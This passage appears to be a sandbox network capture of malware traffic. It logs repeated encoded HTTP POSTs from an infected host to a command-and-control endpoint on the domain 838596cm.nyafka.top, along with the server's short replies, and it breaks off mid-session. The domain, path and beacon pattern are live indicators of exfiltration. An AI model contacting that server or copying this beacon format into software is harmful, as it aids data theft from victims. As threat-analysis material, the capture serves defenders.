                                                                                                          Jan 8, 2025 17:14:18.254455090 CET2532OUTData Raw: 55 50 5e 57 5c 5f 56 53 5e 5f 57 54 56 57 59 58 57 50 58 58 50 5d 56 5d 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UP^W\_VS^_WTVWYXWPXXP]V][EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ _+'3==,4\*.!^=+09</\)Y4X6[4.#_&'P-


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          103192.168.2.550086104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:18.356720924 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1828
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:18.707510948 CET1828OUTData Raw: 50 51 5e 5f 5c 5a 56 5e 5e 5f 57 54 56 56 59 5a 57 57 58 5e 50 59 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PQ^_\ZV^^_WTVVYZWWX^PYVZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#?;73"^>8+]*.*=608.V?*<X >7\-?#_&'P-
                                                                                                          Jan 8, 2025 17:14:18.820144892 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:19.064811945 CET951INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:19 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GKxaKFz%2BVNJDuI48VgTelpRyJ6C1yIV13lpxbveXw1UB5LXRszV8iyYWgl1jdp0vvIfBIHUPiXfLtuhSu7jfz4sWhrnCRLHg6GGy%2BhSipLdzfzq0ngGngcMSfCpsQjkKiBfa6FcL"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7ad75d41424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3546&min_rtt=1641&rtt_var=4426&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2177&delivery_rate=86467&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 24 56 30 04 28 5e 23 38 29 1e 2b 2a 01 5e 3e 20 3a 58 2e 3a 2c 58 26 37 3c 5e 27 2c 2b 02 23 01 25 12 3f 06 31 5d 27 0f 27 09 2b 2b 20 5c 04 1f 24 1b 2b 38 29 10 3e 3f 39 04 24 0d 3d 5a 25 23 28 59 31 3d 3b 5b 27 17 21 0e 21 29 20 09 2c 30 32 52 3a 28 28 10 3c 09 09 05 26 2e 2f 50 0f 10 38 50 2d 07 2b 5b 21 21 07 0a 22 55 2b 5c 20 1b 3f 00 2a 04 27 19 22 01 0c 03 24 30 25 1b 37 54 3c 0c 30 33 27 5c 3c 21 28 56 3f 33 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98$V0(^#8)+*^> :X.:,X&7<^',+#%?1]''++ \$+8)>?9$=Z%#(Y1=;['!!) ,02R:((<&./P8P-+[!!"U+\ ?*'"$0%7T<03'\<!(V?3$U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          104192.168.2.550087104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:18.499248028 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:18.848143101 CET2532OUTData Raw: 55 5d 5e 5e 5c 5c 53 5e 5e 5f 57 54 56 5b 59 5a 57 52 58 58 50 5a 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U]^^\\S^^_WTV[YZWRXXPZVZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ X+<%#.X?-"/)5^>'1+*?;5:#_&'P-3
                                                                                                          Jan 8, 2025 17:14:18.972383022 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:19.216840982 CET804INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:19 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ABGAwXdBJh6g%2FKxseNi4%2BCxRkU14bz4RhBwoQnQSj7vhml7Iw49Yi4Sl%2BFVGGr6Tj4Xid6MmT0tZmcF0IimXaS3lh9ajxqGvl86Epdpp6GLSj5qptfZ99ABX9qHPvy1dNov3gUg"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7ad84e730f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4309&min_rtt=1624&rtt_var=5980&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=63176&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          105192.168.2.550088104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:19.350980043 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:19.707448959 CET2532OUTData Raw: 55 57 5e 57 5c 5a 56 5a 5e 5f 57 54 56 58 59 5f 57 51 58 58 50 5c 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UW^W\ZVZ^_WTVXY_WQXXP\VZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#((<$=[9\,$(=X)[=(%Z$(!)2>? 6+-#_&'P-?
                                                                                                          Jan 8, 2025 17:14:19.813970089 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:20.046108961 CET803INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:19 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=he30WxAHyYBQ4nzK9hO32eld4up9elCvBZB1jSt87JZh4ENU%2BM5ziFklXuqI5fBKbzGUfH5ifSpp%2BgNjiRJFM4B6hCioDhLywSc22qPN9GreZnnxNGttEscB3BlaD8IqC92Os9DC"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7add8d7c0f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8306&min_rtt=1710&rtt_var=13833&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=26799&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          106192.168.2.550089104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:20.191917896 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:20.551271915 CET2532OUTData Raw: 55 5c 5e 53 5c 5d 56 5d 5e 5f 57 54 56 5b 59 5a 57 53 58 5c 50 5e 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U\^S\]V]^_WTV[YZWSX\P^V[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#(?03>Z?=\.$')>>8"3(1<3X)/!#9?#_&'P-3
                                                                                                          Jan 8, 2025 17:14:20.654272079 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:20.890642881 CET805INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:20 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5g542zYJ17xqLUAFRrEML%2FREva5Sz0lR7utPnIsVOJ7lnDwxn5geuAxjjaWVi%2BVj61jouQhfIE3XiXbY5HeZMpDG5Bsv7HtQ5bY9TpHgK4Yw2B9BZVqFvA%2BQUUoNIZLIXsr5xeU4"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7ae2c8f743b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2765&min_rtt=1550&rtt_var=3011&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=129524&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          107192.168.2.550090104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:21.022206068 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:21.379425049 CET2532OUTData Raw: 50 50 5e 5e 59 59 56 59 5e 5f 57 54 56 5b 59 5f 57 56 58 52 50 5b 56 50 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PP^^YYVY^_WTV[Y_WVXRP[VP[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ Z*+(0%>.'()5Z>2']"P)!'X>Y !-<.#_&'P-3
                                                                                                          Jan 8, 2025 17:14:21.474765062 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:21.632253885 CET810INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:21 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hd8F5czzqpD5dfhKDxcPDB9mML1BEU5A84ScRY8SWpPzQcbDaie1whiRal19s%2BOBTXpJ32FA2J3VuxkqpL4r%2B4u7q2xXiiLI8PM647btHetwTOyujj%2FIrrJVQtyW%2B3N%2B5RFWQ9q%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7ae7e9d7729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3873&min_rtt=2012&rtt_var=4478&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=86354&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          108192.168.2.550091104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:21.761374950 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:22.114376068 CET2532OUTData Raw: 50 57 5b 54 59 58 53 58 5e 5f 57 54 56 57 59 5e 57 55 58 5c 50 54 56 5d 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PW[TYXSX^_WTVWY^WUX\PTV][EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#<<$#*[=[5;4Y?>%[)&3;!?1;_*< "(9?#_&'P-
                                                                                                          Jan 8, 2025 17:14:22.226757050 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:22.402900934 CET803INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:22 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bp263HCd85oE9g1nrHydcd47v43zL1Gs1VJHKkj0U4DjGh0cF04Y3GsVNvzAE1cMOGzva7xDvj%2BhXz9jVVQn6ula1dNIdbWF7i50pDFGgMTCepu0iciBZOOWl5imExm9xLUYc4PV"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7aec982b729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9949&min_rtt=2002&rtt_var=16644&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=22263&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          109192.168.2.550092104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:22.531862020 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:22.879308939 CET2532OUTData Raw: 55 52 5b 55 59 58 56 5f 5e 5f 57 54 56 5a 59 5c 57 53 58 5b 50 5e 56 50 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UR[UYXV_^_WTVZY\WSX[P^VP[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#?+/33=)8?X)")]!$8"V+"'(/<";X9#_&'P-7
                                                                                                          Jan 8, 2025 17:14:23.009356976 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:23.240482092 CET806INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:23 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKmYQsgiYjS8TMRaxGpiAzWIPqSzla0GrQfDMb8iPCXkN%2BK%2FjqK9e8mnnV3Nn2qQW7tRwyRkW%2F3HC4zhWptSiyNyOu3Gtiz0IGGK%2B8HiGY6OZcXcRgJyXeKHK1xGfamd6A6FArL7"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7af17a88727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3984&min_rtt=1986&rtt_var=4741&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=81228&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          110192.168.2.550093104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:23.369513035 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:23.723109961 CET2532OUTData Raw: 50 55 5b 53 59 5e 56 52 5e 5f 57 54 56 5d 59 53 57 56 58 5b 50 55 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PU[SY^VR^_WTV]YSWVX[PUV[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ *8'#=[,'Y=2*"$(9+13X=?(5_:?#_&'P-+
                                                                                                          Jan 8, 2025 17:14:23.820741892 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:24.053936958 CET805INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:24 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TC4t6pf2Gz7mNS5CyyhKH88ollwEdIwmSF5YrUe4vSiOdYh%2BwVOFd5XpCt6zMgDxbUKdGjTX3xBKmaiHkd6%2FHDJqi8kGZY8pYp5q5PRoaFMLtt0POQ8%2FqUVB9m6PChtRz6qLVLqt"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7af69eeec34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3026&min_rtt=1521&rtt_var=3581&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=107629&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          111192.168.2.550094104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:24.073304892 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1852
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:24.426218987 CET1852OUTData Raw: 50 51 5e 52 59 59 56 58 5e 5f 57 54 56 57 59 58 57 56 58 5a 50 5d 56 5d 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PQ^RYYVX^_WTVWYXWVXZP]V][EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ ^+3X002Y*".$'X)X=]);5'(-+;(/([6#].#_&'P-
                                                                                                          Jan 8, 2025 17:14:24.535978079 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:24.698156118 CET950INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:24 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=88cS9HivVR0i9w5PIt5g3TB1NCdjgmTWHr0IVaR2kzKcQ84K0kp9yjkMoUkBDwceHR3f3shvNqs4WcZgMAVJPidL6UMaVmcSm6mPdvvLPDEcWcDpViDX6yeTyC3P9au6R%2Fm3izli"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7afb09e6424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
